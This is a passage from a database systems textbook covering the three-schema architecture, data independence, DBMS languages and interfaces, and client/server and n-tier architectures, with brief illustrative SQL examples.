which uses the relational model to describe the conceptual schema, but may use an
object-oriented model to describe an external schema.

Notice that the three schemas are only descriptions of data; the stored data that
actually exists is at the physical level only. In a DBMS based on the three-schema
architecture, each user group refers to its own external schema. Hence, the DBMS
must transform a request specified on an external schema into a request against the
conceptual schema, and then into a request on the internal schema for processing
over the stored database. If the request is a database retrieval, the data extracted
from the stored database must be reformatted to match the user’s external view. The
processes of transforming requests and results between levels are called mappings.
These mappings may be time-consuming, so some DBMSs—especially those that
are meant to support small databases—do not support external views. Even in such
systems, however, a certain amount of mapping is necessary to transform requests
between the conceptual and internal levels.

2.2 Data Independence
The three-schema architecture can be used to further explain the concept of data
independence, which can be defined as the capacity to change the schema at one
level of a database system without having to change the schema at the next higher
level. We can define two types of data independence:

1. Logical data independence is the capacity to change the conceptual schema
without having to change external schemas or application programs. We
may change the conceptual schema to expand the database (by adding a
record type or data item), to change constraints, or to reduce the database
(by removing a record type or data item). In the last case, external schemas
that refer only to the remaining data should not be affected. Only the view
definition and the mappings need to be changed in a DBMS that supports
logical data independence. After the conceptual schema undergoes a logical
reorganization, application programs that reference the external schema
constructs must work as before. Changes to constraints can be applied to the
conceptual schema without affecting the external schemas or application
programs.

2. Physical data independence is the capacity to change the internal schema
without having to change the conceptual schema. Hence, the external
schemas need not be changed as well. Changes to the internal schema may be
needed because some physical files were reorganized—for example, by creat-
ing additional access structures—to improve the performance of retrieval or
update. If the same data as before remains in the database, we should not
have to change the conceptual schema. For example, providing an access
path to improve retrieval speed of section records (Figure A.1) by semester
and year should not require a query such as list all sections offered in fall 2008
to be changed, although the query would be executed more efficiently by the
DBMS by utilizing the new access path.

Generally, physical data independence exists in most databases and file environ-
ments where physical details such as the exact location of data on disk, and hard-
ware details of storage encoding, placement, compression, splitting, merging of
records, and so on are hidden from the user. Applications remain unaware of these
details. On the other hand, logical data independence is harder to achieve because it
allows structural and constraint changes without affecting application programs—a
much stricter requirement.
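
To make the access-path example from point 2 concrete: an index can be added at the internal level without changing the conceptual schema or the query, which is the essence of physical data independence. The index name and exact syntax below are illustrative:

    -- Internal-level change only: create an access path on SECTION.
    CREATE INDEX Sec_sem_year_idx ON SECTION (Semester, Year);

    -- The conceptual-level query is unchanged; it simply runs faster.
    SELECT * FROM SECTION WHERE Semester = 'Fall' AND Year = 2008;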

Whenever we have a multiple-level DBMS, its catalog must be expanded to include
information on how to map requests and data among the various levels. The DBMS
uses additional software to accomplish these mappings by referring to the mapping
information in the catalog. Data independence occurs because when the schema is
changed at some level, the schema at the next higher level remains unchanged; only
the mapping between the two levels is changed. Hence, application programs refer-
ring to the higher-level schema need not be changed.

The three-schema architecture can make it easier to achieve true data indepen-
dence, both physical and logical. However, the two levels of mappings create an
overhead during compilation or execution of a query or program, leading to ineffi-
ciencies in the DBMS. Because of this, few DBMSs have implemented the full three-
schema architecture.

3 Database Languages and Interfaces
The DBMS must provide appropriate languages and interfaces for each category of
users. In this section we discuss the types of languages and interfaces provided by a
DBMS and the user categories targeted by each interface.

3.1 DBMS Languages
Once the design of a database is completed and a DBMS is chosen to implement the
database, the first step is to specify conceptual and internal schemas for the database
and any mappings between the two. In many DBMSs where no strict separation of
levels is maintained, one language, called the data definition language (DDL), is
used by the DBA and by database designers to define both schemas. The DBMS will
have a DDL compiler whose function is to process DDL statements in order to iden-
tify descriptions of the schema constructs and to store the schema description in the
DBMS catalog.

In DBMSs where a clear separation is maintained between the conceptual and inter-
nal levels, the DDL is used to specify the conceptual schema only. Another language,
the storage definition language (SDL), is used to specify the internal schema. The
mappings between the two schemas may be specified in either one of these lan-
guages. In most relational DBMSs today, there is no specific language that performs
the role of SDL. Instead, the internal schema is specified by a combination of func-
tions, parameters, and specifications related to storage. These permit the DBA staff
to control indexing choices and mapping of data to storage. For a true three-schema
architecture, we would need a third language, the view definition language (VDL),
to specify user views and their mappings to the conceptual schema, but in most
DBMSs the DDL is used to define both conceptual and external schemas. In relational
DBMSs, SQL is used in the role of VDL to define user or application views as results
of predefined queries.
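
As a hedged illustration of SQL in the VDL role, a view for one user group might be defined over the base tables of Figure 1; the view name and the join condition on Student_number are assumptions for this sketch:

    -- An external-schema style view: each student's grade per course section.
    CREATE VIEW STUDENT_GRADES AS
    SELECT S.Name, S.Student_number, G.Section_identifier, G.Grade
    FROM   STUDENT S
    JOIN   GRADE_REPORT G ON G.Student_number = S.Student_number;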

Once the database schemas are compiled and the database is populated with data,
users must have some means to manipulate the database. Typical manipulations
include retrieval, insertion, deletion, and modification of the data. The DBMS pro-
vides a set of operations or a language called the data manipulation language
(DML) for these purposes.

In current DBMSs, the preceding types of languages are usually not considered dis-
tinct languages; rather, a comprehensive integrated language is used that includes
constructs for conceptual schema definition, view definition, and data manipula-
tion. Storage definition is typically kept separate, since it is used for defining physi-
cal storage structures to fine-tune the performance of the database system, which is
usually done by the DBA staff. A typical example of a comprehensive database lan-
guage is the SQL relational database language, which represents a combination of
DDL, VDL, and DML, as well as statements for constraint specification, schema
evolution, and other features. The SDL was a component in early versions of SQL
but has been removed from the language to keep it at the conceptual and external
levels only.

There are two main types of DMLs. A high-level or nonprocedural DML can be
used on its own to specify complex database operations concisely. Many DBMSs
allow high-level DML statements either to be entered interactively from a display
monitor or terminal or to be embedded in a general-purpose programming lan-
guage. In the latter case, DML statements must be identified within the program so
that they can be extracted by a precompiler and processed by the DBMS. A low-
level or procedural DML must be embedded in a general-purpose programming
language. This type of DML typically retrieves individual records or objects from
the database and processes each separately. Therefore, it needs to use programming
language constructs, such as looping, to retrieve and process each record from a set
of records. Low-level DMLs are also called record-at-a-time DMLs because of this
property. DL/1, a DML designed for the hierarchical model, is a low-level DML that
uses commands such as GET UNIQUE, GET NEXT, or GET NEXT WITHIN PARENT to
navigate from record to record within a hierarchy of records in the database. High-
level DMLs, such as SQL, can specify and retrieve many records in a single DML
statement; therefore, they are called set-at-a-time or set-oriented DMLs. A query in
a high-level DML often specifies which data to retrieve rather than how to retrieve it;
therefore, such languages are also called declarative.
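
A single set-oriented SQL statement, for example, retrieves many records at once and states what to retrieve rather than how; the table and column names follow Figure 1:

    -- Set-at-a-time, declarative retrieval: all senior CS majors in one statement.
    SELECT Name, Student_number
    FROM   STUDENT
    WHERE  Major = 'CS' AND Class = 4;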

Whenever DML commands, whether high level or low level, are embedded in a
general-purpose programming language, that language is called the host language
and the DML is called the data sublanguage.9 On the other hand, a high-level DML
used in a standalone interactive manner is called a query language. In general, both
retrieval and update commands of a high-level DML may be used interactively and
are hence considered part of the query language.10

Casual end users typically use a high-level query language to specify their requests,
whereas programmers use the DML in its embedded form. For naive and paramet-
ric users, there usually are user-friendly interfaces for interacting with the data-
base; these can also be used by casual users or others who do not want to learn the
details of a high-level query language. We discuss these types of interfaces next.

3.2 DBMS Interfaces
User-friendly interfaces provided by a DBMS may include the following:

Menu-Based Interfaces for Web Clients or Browsing. These interfaces pre-
sent the user with lists of options (called menus) that lead the user through the for-
mulation of a request. Menus do away with the need to memorize the specific
commands and syntax of a query language; rather, the query is composed step-by-
step by picking options from a menu that is displayed by the system. Pull-down
menus are a very popular technique in Web-based user interfaces. They are also
often used in browsing interfaces, which allow a user to look through the contents
of a database in an exploratory and unstructured manner.

Forms-Based Interfaces. A forms-based interface displays a form to each user.
Users can fill out all of the form entries to insert new data, or they can fill out only
certain entries, in which case the DBMS will retrieve matching data for the remain-
ing entries. Forms are usually designed and programmed for naive users as inter-
faces to canned transactions. Many DBMSs have forms specification languages,

9In object databases, the host and data sublanguages typically form one integrated language—for exam-
ple, C++ with some extensions to support database functionality. Some relational systems also provide
integrated languages—for example, Oracle’s PL/SQL.
10According to the English meaning of the word query, it should really be used to describe retrievals only,
not updates.

which are special languages that help programmers specify such forms. SQL*Forms
is a form-based language that specifies queries using a form designed in conjunc-
tion with the relational database schema. Oracle Forms is a component of the
Oracle product suite that provides an extensive set of features to design and build
applications using forms. Some systems have utilities that define a form by letting
the end user interactively construct a sample form on the screen.

Graphical User Interfaces. A GUI typically displays a schema to the user in dia-
grammatic form. The user then can specify a query by manipulating the diagram. In
many cases, GUIs utilize both menus and forms. Most GUIs use a pointing device,
such as a mouse, to select certain parts of the displayed schema diagram.

Natural Language Interfaces. These interfaces accept requests written in
English or some other language and attempt to understand them. A natural lan-
guage interface usually has its own schema, which is similar to the database concep-
tual schema, as well as a dictionary of important words. The natural language
interface refers to the words in its schema, as well as to the set of standard words in
its dictionary, to interpret the request. If the interpretation is successful, the inter-
face generates a high-level query corresponding to the natural language request and
submits it to the DBMS for processing; otherwise, a dialogue is started with the user
to clarify the request. The capabilities of natural language interfaces have not
advanced rapidly. Today, we see search engines that accept strings of natural lan-
guage (like English or Spanish) words and match them with documents at specific
sites (for local search engines) or Web pages on the Web at large (for engines like
Google or Ask). They use predefined indexes on words and use ranking functions to
retrieve and present resulting documents in a decreasing degree of match. Such
“free form” textual query interfaces are not yet common in structured relational or
legacy model databases, although a research area called keyword-based querying
has emerged recently for relational databases.

Speech Input and Output. Limited use of speech as an input query and speech
as an answer to a question or result of a request is becoming commonplace.
Applications with limited vocabularies such as inquiries for telephone directory,
flight arrival/departure, and credit card account information are allowing speech
for input and output to enable customers to access this information. The speech
input is detected using a library of predefined words and used to set up the param-
eters that are supplied to the queries. For output, a similar conversion from text or
numbers into speech takes place.

Interfaces for Parametric Users. Parametric users, such as bank tellers, often
have a small set of operations that they must perform repeatedly. For example, a
teller is able to use single function keys to invoke routine and repetitive transactions
such as account deposits or withdrawals, or balance inquiries. Systems analysts and
programmers design and implement a special interface for each known class of
naive users. Usually a small set of abbreviated commands is included, with the goal
of minimizing the number of keystrokes required for each request. For example,
function keys in a terminal can be programmed to initiate various commands. This
allows the parametric user to proceed with a minimal number of keystrokes.

Interfaces for the DBA. Most database systems contain privileged commands
that can be used only by the DBA staff. These include commands for creating
accounts, setting system parameters, granting account authorization, changing a
schema, and reorganizing the storage structures of a database.
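
In SQL-based systems, some of these privileged operations look roughly like the following; account-management syntax varies by DBMS, and the user name, password, and view name are assumptions, so treat this as a sketch:

    -- Account creation and authorization (syntax varies across DBMSs).
    CREATE USER advisor1 IDENTIFIED BY 'a_password';
    GRANT SELECT ON STUDENT_GRADES TO advisor1;   -- access through a view only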

4 The Database System Environment
A DBMS is a complex software system. In this section we discuss the types of soft-
ware components that constitute a DBMS and the types of computer system soft-
ware with which the DBMS interacts.

4.1 DBMS Component Modules
Figure 3 illustrates, in a simplified form, the typical DBMS components. The figure
is divided into two parts. The top part of the figure refers to the various users of the
database environment and their interfaces. The lower part shows the internals of the
DBMS responsible for storage of data and processing of transactions.

The database and the DBMS catalog are usually stored on disk. Access to the disk is
controlled primarily by the operating system (OS), which schedules disk
read/write. Many DBMSs have their own buffer management module to schedule
disk read/write, because this has a considerable effect on performance. Reducing
disk read/write improves performance considerably. A higher-level stored data
manager module of the DBMS controls access to DBMS information that is stored
on disk, whether it is part of the database or the catalog.

Let us consider the top part of Figure 3 first. It shows interfaces for the DBA staff,
casual users who work with interactive interfaces to formulate queries, application
programmers who create programs using some host programming languages, and
parametric users who do data entry work by supplying parameters to predefined
transactions. The DBA staff works on defining the database and tuning it by making
changes to its definition using the DDL and other privileged commands.

The DDL compiler processes schema definitions, specified in the DDL, and stores
descriptions of the schemas (meta-data) in the DBMS catalog. The catalog includes
information such as the names and sizes of files, names and data types of data items,
storage details of each file, mapping information among schemas, and constraints.
In addition, the catalog stores many other types of information that are needed by
the DBMS modules, which can then look up the catalog information as needed.
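
In many relational DBMSs the catalog itself can be queried through the standard INFORMATION_SCHEMA views; a sketch of retrieving stored meta-data about the STUDENT table might look like this:

    -- Reading meta-data from the catalog (supported by DBMSs that implement
    -- the SQL standard INFORMATION_SCHEMA).
    SELECT COLUMN_NAME, DATA_TYPE
    FROM   INFORMATION_SCHEMA.COLUMNS
    WHERE  TABLE_NAME = 'STUDENT';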

Casual users and persons with occasional need for information from the database
interact using some form of interface, which we call the interactive query interface
in Figure 3. We have not explicitly shown any menu-based or form-based interac-
tion that may be used to generate the interactive query automatically. These queries
are parsed and validated for correctness of the query syntax, the names of files and

Figure 3
Component modules of a DBMS and their interactions. The top part shows the users (DBA staff,
casual users, application programmers, and parametric users) and their inputs: DDL statements
and privileged commands, interactive queries, application programs, and compiled (canned)
transactions. The lower part shows the internals for query and transaction execution: the DDL
compiler, query compiler and query optimizer, precompiler, DML compiler and host language
compiler, runtime database processor, concurrency control/backup/recovery subsystems, and
stored data manager, together with the system catalog/data dictionary and the stored database.

data elements, and so on by a query compiler that compiles them into an internal
form. This internal query is subjected to query optimization. Among other things,
the query optimizer is concerned with the rearrangement and possible reordering
of operations, elimination of redundancies, and use of correct algorithms and
indexes during execution. It consults the system catalog for statistical and other
physical information about the stored data and generates executable code that per-
forms the necessary operations for the query and makes calls on the runtime
processor.
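
Many DBMSs expose the optimizer's chosen plan through an EXPLAIN-style statement; the exact keyword and output format vary by system (PostgreSQL and MySQL, for example, both provide EXPLAIN), so this is only a sketch:

    -- Ask the optimizer to show its execution plan instead of running the query.
    EXPLAIN
    SELECT Name
    FROM   STUDENT
    WHERE  Major = 'CS';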

Application programmers write programs in host languages such as Java, C, or C++
that are submitted to a precompiler. The precompiler extracts DML commands
from an application program written in a host programming language. These com-
mands are sent to the DML compiler for compilation into object code for database
access. The rest of the program is sent to the host language compiler. The object
codes for the DML commands and the rest of the program are linked, forming a
canned transaction whose executable code includes calls to the runtime database
processor. Canned transactions are executed repeatedly by parametric users, who
simply supply the parameters to the transactions. Each execution is considered to be
a separate transaction. An example is a bank withdrawal transaction where the
account number and the amount may be supplied as parameters.
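
A canned transaction of this kind is often packaged as a parameterized stored procedure. The sketch below uses SQL/PSM-style syntax, and the ACCOUNT table and procedure name are assumptions for illustration:

    -- Hypothetical canned transaction: parametric users supply only acct_no and amount.
    -- Assumes an ACCOUNT(Account_number, Balance) table.
    CREATE PROCEDURE WITHDRAW (IN acct_no INT, IN amount DECIMAL(10,2))
    BEGIN
      UPDATE ACCOUNT
      SET    Balance = Balance - amount
      WHERE  Account_number = acct_no AND Balance >= amount;
    END;
    -- Each execution, such as CALL WITHDRAW(1234, 50.00), is a separate transaction.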

In the lower part of Figure 3, the runtime database processor executes (1) the privi-
leged commands, (2) the executable query plans, and (3) the canned transactions
with runtime parameters. It works with the system catalog and may update it with
statistics. It also works with the stored data manager, which in turn uses basic oper-
ating system services for carrying out low-level input/output (read/write) operations
between the disk and main memory. The runtime database processor handles other
aspects of data transfer, such as management of buffers in the main memory. Some
DBMSs have their own buffer management module while others depend on the OS
for buffer management. We have shown concurrency control and backup and recov-
ery systems separately as a module in this figure. They are integrated into the work-
ing of the runtime database processor for purposes of transaction management.

It is now common to have the client program that accesses the DBMS running on a
separate computer from the computer on which the database resides. The former is
called the client computer running a DBMS client software and the latter is called
the database server. In some cases, the client accesses a middle computer, called the
application server, which in turn accesses the database server. We elaborate on this
topic in Section 5.

Figure 3 is not meant to describe a specific DBMS; rather, it illustrates typical DBMS
modules. The DBMS interacts with the operating system when disk accesses—to the
database or to the catalog—are needed. If the computer system is shared by many
users, the OS will schedule DBMS disk access requests and DBMS processing along
with other processes. On the other hand, if the computer system is mainly dedicated
to running the database server, the DBMS will control main memory buffering of
disk pages. The DBMS also interfaces with compilers for general-purpose host pro-
gramming languages, and with application servers and client programs running on
separate machines through the system network interface.

4.2 Database System Utilities
In addition to possessing the software modules just described, most DBMSs have
database utilities that help the DBA manage the database system. Common utilities
have the following types of functions:

■ Loading. A loading utility is used to load existing data files—such as text
files or sequential files—into the database. Usually, the current (source) for-
mat of the data file and the desired (target) database file structure are speci-
fied to the utility, which then automatically reformats the data and stores it
in the database. With the proliferation of DBMSs, transferring data from one
DBMS to another is becoming common in many organizations. Some ven-
dors are offering products that generate the appropriate loading programs,
given the existing source and target database storage descriptions (internal
schemas). Such tools are also called conversion tools. For the hierarchical
DBMS called IMS (IBM) and for many network DBMSs including IDMS
(Computer Associates), SUPRA (Cincom), and IMAGE (HP), the vendors or
third-party companies are making a variety of conversion tools available
(e.g., Cincom’s SUPRA Server SQL) to transform data into the relational
model.

■ Backup. A backup utility creates a backup copy of the database, usually by
dumping the entire database onto tape or other mass storage medium. The
backup copy can be used to restore the database in case of catastrophic disk
failure. Incremental backups are also often used, where only changes since
the previous backup are recorded. Incremental backup is more complex, but
saves storage space.

■ Database storage reorganization. This utility can be used to reorganize a set
of database files into different file organizations, and create new access paths
to improve performance.

■ Performance monitoring. Such a utility monitors database usage and pro-
vides statistics to the DBA. The DBA uses the statistics in making decisions
such as whether or not to reorganize files or whether to add or drop indexes
to improve performance.

Other utilities may be available for sorting files, handling data compression,
monitoring access by users, interfacing with the network, and performing other
functions.

4.3 Tools, Application Environments,
and Communications Facilities

Other tools are often available to database designers, users, and the DBMS. CASE
tools11 are used in the design phase of database systems. Another tool that can be
quite useful in large organizations is an expanded data dictionary (or data reposi-
tory) system. In addition to storing catalog information about schemas and con-
straints, the data dictionary stores other information, such as design decisions,
usage standards, application program descriptions, and user information. Such a
system is also called an information repository. This information can be accessed
directly by users or the DBA when needed. A data dictionary utility is similar to the
DBMS catalog, but it includes a wider variety of information and is accessed mainly
by users rather than by the DBMS software.

11Although CASE stands for computer-aided software engineering, many CASE tools are used primarily
for database design.

Application development environments, such as PowerBuilder (Sybase) or
JBuilder (Borland), have been quite popular. These systems provide an environment
for developing database applications and include facilities that help in many facets
of database systems, including database design, GUI development, querying and
updating, and application program development.

The DBMS also needs to interface with communications software, whose function
is to allow users at locations remote from the database system site to access the data-
base through computer terminals, workstations, or personal computers. These are
connected to the database site through data communications hardware such as
Internet routers, phone lines, long-haul networks, local networks, or satellite com-
munication devices. Many commercial database systems have communication
packages that work with the DBMS. The integrated DBMS and data communica-
tions system is called a DB/DC system. In addition, some distributed DBMSs are
physically distributed over multiple machines. In this case, communications net-
works are needed to connect the machines. These are often local area networks
(LANs), but they can also be other types of networks.

5 Centralized and Client/Server Architectures
for DBMSs

5.1 Centralized DBMSs Architecture
Architectures for DBMSs have followed trends similar to those for general computer
system architectures. Earlier architectures used mainframe computers to provide
the main processing for all system functions, including user application programs
and user interface programs, as well as all the DBMS functionality. The reason was
that most users accessed such systems via computer terminals that did not have pro-
cessing power and only provided display capabilities. Therefore, all processing was
performed remotely on the computer system, and only display information and
controls were sent from the computer to the display terminals, which were con-
nected to the central computer via various types of communications networks.

As prices of hardware declined, most users replaced their terminals with PCs and
workstations. At first, database systems used these computers similarly to how they
had used display terminals, so that the DBMS itself was still a centralized DBMS in
which all the DBMS functionality, application program execution, and user inter-
face processing were carried out on one machine. Figure 4 illustrates the physical
components in a centralized architecture. Gradually, DBMS systems started to
exploit the available processing power at the user side, which led to client/server
DBMS architectures.

5.2 Basic Client/Server Architectures
First, we discuss client/server architecture in general, then we see how it is applied to
DBMSs. The client/server architecture was developed to deal with computing envi-
ronments in which a large number of PCs, workstations, file servers, printers, database
servers, Web servers, e-mail servers, and other software and equipment are connected
via a network.

[Figure 4: A physical centralized architecture.]

The idea is to define specialized servers with specific
functionalities. For example, it is possible to connect a number of PCs or small
workstations as clients to a file server that maintains the files of the client machines.
Another machine can be designated as a printer server by being connected to vari-
ous printers; all print requests by the clients are forwarded to this machine. Web
servers or e-mail servers also fall into the specialized server category. The resources
provided by specialized servers can be accessed by many client machines. The client
machines provide the user with the appropriate interfaces to utilize these servers, as
well as with local processing power to run local applications. This concept can be
carried over to other software packages, with specialized programs—such as a CAD
(computer-aided design) package—being stored on specific server machines and
being made accessible to multiple clients. Figure 5 illustrates client/server architec-
ture at the logical level; Figure 6 is a simplified diagram that shows the physical
architecture. Some machines would be client sites only (for example, diskless work-
stations or workstations/PCs with disks that have only client software installed).

[Figure 5: Logical two-tier client/server architecture.]

[Figure 6: Physical two-tier client/server architecture.]

Other machines would be dedicated servers, and others would have both client and
server functionality.

The concept of client/server architecture assumes an underlying framework that
consists of many PCs and workstations as well as a smaller number of mainframe
machines, connected via LANs and other types of computer networks. A client in
this framework is typically a user machine that provides user interface capabilities
and local processing. When a client requires access to additional functionality—
such as database access—that does not exist at that machine, it connects to a server
that provides the needed functionality. A server is a system containing both hard-
ware and software that can provide services to the client machines, such as file
access, printing, archiving, or database access. In general, some machines install
only client software, others only server software, and still others may include both
client and server software, as illustrated in Figure 6. However, it is more common
for the client and server software to run on separate machines. Two main types of
basic DBMS architectures were created on this underlying client/server framework:
two-tier and three-tier.12 We discuss them next.

5.3 Two-Tier Client/Server Architectures for DBMSs
In relational database management systems (RDBMSs), many of which started as
centralized systems, the system components that were first moved to the client side
were the user interface and application programs. Because SQL provided a standard
language for RDBMSs, this created a logical dividing point between client and
server. Hence, the query and transaction functionality related to SQL processing
remained on the server side. In such an architecture, the server is often called a
query server or transaction server because it provides these two functionalities. In
an RDBMS, the server is also often called an SQL server.

12There are many other variations of client/server architectures. We discuss the two most basic ones
here.

The user interface programs and application programs can run on the client side.
When DBMS access is required, the program establishes a connection to the DBMS
(which is on the server side); once the connection is created, the client program can
communicate with the DBMS. A standard called Open Database Connectivity
(ODBC) provides an application programming interface (API), which allows
client-side programs to call the DBMS, as long as both client and server machines
have the necessary software installed. Most DBMS vendors provide ODBC drivers
for their systems. A client program can actually connect to several RDBMSs and
send query and transaction requests using the ODBC API, which are then processed
at the server sites. Any query results are sent back to the client program, which can
process and display the results as needed. A related standard for the Java program-
ming language, called JDBC, has also been defined. This allows Java client programs
to access one or more DBMSs through a standard interface.

A different approach to two-tier client/server architecture was taken by some
object-oriented DBMSs, where the software modules of the DBMS were divided
between client and server in a more integrated way. For example, the server level
may include the part of the DBMS software responsible for handling data storage on
disk pages, local concurrency control and recovery, buffering and caching of disk
pages, and other such functions. Meanwhile, the client level may handle the user
interface; data dictionary functions; DBMS interactions with programming lan-
guage compilers; global query optimization, concurrency control, and recovery
across multiple servers; structuring of complex objects from the data in the buffers;
and other such functions. In this approach, the client/server interaction is more
tightly coupled and is done internally by the DBMS modules—some of which reside
on the client and some on the server—rather than by the users/programmers. The
exact division of functionality can vary from system to system. In such a
client/server architecture, the server has been called a data server because it pro-
vides data in disk pages to the client. This data can then be structured into objects
for the client programs by the client-side DBMS software.

The architectures described here are called two-tier architectures because the soft-
ware components are distributed over two systems: client and server. The advan-
tages of this architecture are its simplicity and seamless compatibility with existing
systems. The emergence of the Web changed the roles of clients and servers, leading
to the three-tier architecture.

5.4 Three-Tier and n-Tier Architectures
for Web Applications

Many Web applications use an architecture called the three-tier architecture, which
adds an intermediate layer between the client and the database server, as illustrated
in Figure 7(a).

[Figure 7: Logical three-tier client/server architecture, with a couple of commonly used nomenclatures: (a) client (GUI, Web interface), application server or Web server (application programs, Web pages), and database server (database management system); (b) presentation layer, business logic layer, and database services layer.]

This intermediate layer or middle tier is called the application server or the Web
server, depending on the application. This server plays an intermediary role by run-
ning application programs and storing business rules (procedures or constraints)
that are used to access data from the database server. It can also improve database
security by checking a client’s credentials before forwarding a request to the data-
base server. Clients contain GUI interfaces and some additional application-specific
business rules. The intermediate server accepts requests from the client, processes
the request and sends database queries and commands to the database server, and
then acts as a conduit for passing (partially) processed data from the database server
to the clients, where it may be processed further and filtered to be presented to users
in GUI format. Thus, the user interface, application rules, and data access act as the
three tiers. Figure 7(b) shows another architecture used by database and other
application package vendors. The presentation layer displays information to the
user and allows data entry. The business logic layer handles intermediate rules and
constraints before data is passed up to the user or down to the DBMS. The bottom
layer includes all data management services. The middle layer can also act as a Web
server, which retrieves query results from the database server and formats them into
dynamic Web pages that are viewed by the Web browser at the client side.

Other architectures have also been proposed. It is possible to divide the layers
between the user and the stored data further into finer components, thereby giving
rise to n-tier architectures, where n may be four or five tiers. Typically, the business
logic layer is divided into multiple layers. Besides distributing programming and
data throughout a network, n-tier applications afford the advantage that any one
tier can run on an appropriate processor or operating system platform and can be
handled independently. Vendors of ERP (enterprise resource planning) and CRM
(customer relationship management) packages often use a middleware layer, which
accounts for the front-end modules (clients) communicating with a number of
back-end databases (servers).

Advances in encryption and decryption technology make it safer to transfer sensi-
tive data from server to client in encrypted form, where it will be decrypted. The lat-
ter can be done by the hardware or by advanced software. This technology gives
higher levels of data security, but the network security issues remain a major con-
cern. Various technologies for data compression also help to transfer large amounts
of data from servers to clients over wired and wireless networks.

6 Classification of Database
Management Systems

Several criteria are normally used to classify DBMSs. The first is the data model on
which the DBMS is based. The main data model used in many current commercial
DBMSs is the relational data model. The object data model has been implemented
in some commercial systems but has not had widespread use. Many legacy applica-
tions still run on database systems based on the hierarchical and network data
models. Examples of hierarchical DBMSs include IMS (IBM) and some other sys-
tems like System 2K (SAS Inc.) and TDMS. IMS is still used at governmental and
industrial installations, including hospitals and banks, although many of its users
have converted to relational systems. The network data model was used by many
vendors and the resulting products like IDMS (Cullinet—now Computer
Associates), DMS 1100 (Univac—now Unisys), IMAGE (Hewlett-Packard), VAX-
DBMS (Digital—then Compaq and now HP), and SUPRA (Cincom) still have a fol-
lowing and their user groups have their own active organizations. If we add IBM’s
popular VSAM file system to these, we can easily say that a reasonable percentage of
worldwide-computerized data is still in these so-called legacy database systems.

The relational DBMSs are evolving continuously, and, in particular, have been
incorporating many of the concepts that were developed in object databases. This
has led to a new class of DBMSs called object-relational DBMSs. We can categorize
DBMSs based on the data model: relational, object, object-relational, hierarchical,
network, and other.

More recently, some experimental DBMSs are based on the XML (eXtensible
Markup Language) model, which is a tree-structured (hierarchical) data model.
These have been called native XML DBMSs. Several commercial relational DBMSs
have added XML interfaces and storage to their products.

The second criterion used to classify DBMSs is the number of users supported by
the system. Single-user systems support only one user at a time and are mostly used
with PCs. Multiuser systems, which include the majority of DBMSs, support con-
current multiple users.

The third criterion is the number of sites over which the database is distributed. A
DBMS is centralized if the data is stored at a single computer site. A centralized
DBMS can support multiple users, but the DBMS and the database reside totally at
a single computer site. A distributed DBMS (DDBMS) can have the actual database
and DBMS software distributed over many sites, connected by a computer network.
Homogeneous DDBMSs use the same DBMS software at all the sites, whereas
heterogeneous DDBMSs can use different DBMS software at each site. It is also
possible to develop middleware software to access several autonomous preexisting
databases stored under heterogeneous DBMSs. This leads to a federated DBMS (or
multidatabase system), in which the participating DBMSs are loosely coupled and
have a degree of local autonomy. Many DDBMSs use client/server architecture, as
we described in Section 5.

The fourth criterion is cost. It is difficult to propose a classification of DBMSs based
on cost. Today we have open source (free) DBMS products like MySQL and
PostgreSQL that are supported by third-party vendors with additional services. The
main RDBMS products are available as free 30-day examination copies as
well as personal versions, which may cost under $100 and allow a fair amount of
functionality. The giant systems are being sold in modular form with components
to handle distribution, replication, parallel processing, mobile capability, and so on,
and with a large number of parameters that must be defined for the configuration.
Furthermore, they are sold in the form of licenses—site licenses allow unlimited use
of the database system with any number of copies running at the customer site.
Another type of license limits the number of concurrent users or the number of
user seats at a location. Standalone single-user versions of some systems like
Microsoft Access are sold per copy or included in the overall configuration of a
desktop or laptop. In addition, data warehousing and mining features, as well as
support for additional data types, are made available at extra cost. It is possible to
pay millions of dollars for the installation and maintenance of large database sys-
tems annually.

We can also classify a DBMS on the basis of the types of access path options for
storing files. One well-known family of DBMSs is based on inverted file structures.
Finally, a DBMS can be general purpose or special purpose. When performance is
a primary consideration, a special-purpose DBMS can be designed and built for a
specific application; such a system cannot be used for other applications without
major changes. Many airline reservations and telephone directory systems devel-
oped in the past are special-purpose DBMSs. These fall into the category of online
transaction processing (OLTP) systems, which must support a large number of
concurrent transactions without imposing excessive delays.

Let us briefly elaborate on the main criterion for classifying DBMSs: the data model.
The basic relational data model represents a database as a collection of tables,
where each table can be stored as a separate file. The database in Figure A.1 resem-
bles a relational representation. Most relational databases use the high-level query
language called SQL and support a limited form of user views.

The object data model defines a database in terms of objects, their properties, and
their operations. Objects with the same structure and behavior belong to a class,
and classes are organized into hierarchies (or acyclic graphs). The operations of
each class are specified in terms of predefined procedures called methods.
Relational DBMSs have been extending their models to incorporate object database
concepts and other capabilities; these systems are referred to as object-relational or
extended relational systems.

The XML model has emerged as a standard for exchanging data over the Web, and
has been used as a basis for implementing several prototype native XML systems.
XML uses hierarchical tree structures. It combines database concepts with concepts
from document representation models. Data is represented as elements; with the
use of tags, data can be nested to create complex hierarchical structures. This model
conceptually resembles the object model but uses different terminology. XML capa-
bilities have been added to many commercial DBMS products.

Two older, historically important data models, now known as legacy data models,
are the network and hierarchical models. The network model represents data as
record types and also represents a limited type of 1:N relationship, called a set type.
A 1:N, or one-to-many, relationship relates one instance of a record to many record
instances using some pointer linking mechanism in these models. Figure 8 shows a
network schema diagram for the database of Figure 1, where record types are shown
as rectangles and set types are shown as labeled directed arrows.

The network model, also known as the CODASYL DBTG model,13 has an associated
record-at-a-time language that must be embedded in a host programming lan-
guage. The network DML was proposed in the 1971 Database Task Group (DBTG)
Report as an extension of the COBOL language. It provides commands for locating
records directly (e.g., FIND ANY <record type> USING <field list>, or FIND
DUPLICATE <record type> USING <field list>). It has commands to support tra-
versals within set types (e.g., GET OWNER, GET {FIRST, NEXT, LAST} MEMBER
WITHIN <set type> WHERE <condition>). It also has commands to store new data
(e.g., STORE <record type>) and to make it part of a set type (e.g., CONNECT
<record type> TO <set type>). The language also handles many additional consid-
erations, such as the currency of record types and set types, which are defined by the
current position of the navigation process within the database. It is prominently
used by IDMS, IMAGE, and SUPRA DBMSs today.

[Figure 8: The schema of Figure 1 in network model notation, with record types shown as rectangles and set types shown as labeled directed arrows.]

13CODASYL DBTG stands for Conference on Data Systems Languages Database Task Group, which is
the committee that specified the network model and its language.

The hierarchical model represents data as hierarchical tree structures. Each hierar-
chy represents a number of related records. There is no standard language for the
hierarchical model. A popular hierarchical DML is DL/1 of the IMS system. IMS dom-
inated the DBMS market for over 20 years between 1965 and 1985 and is still a
widely used DBMS worldwide, holding a large percentage of data in governmental,
health care, and banking and insurance databases. Its DML, called DL/1, was a de
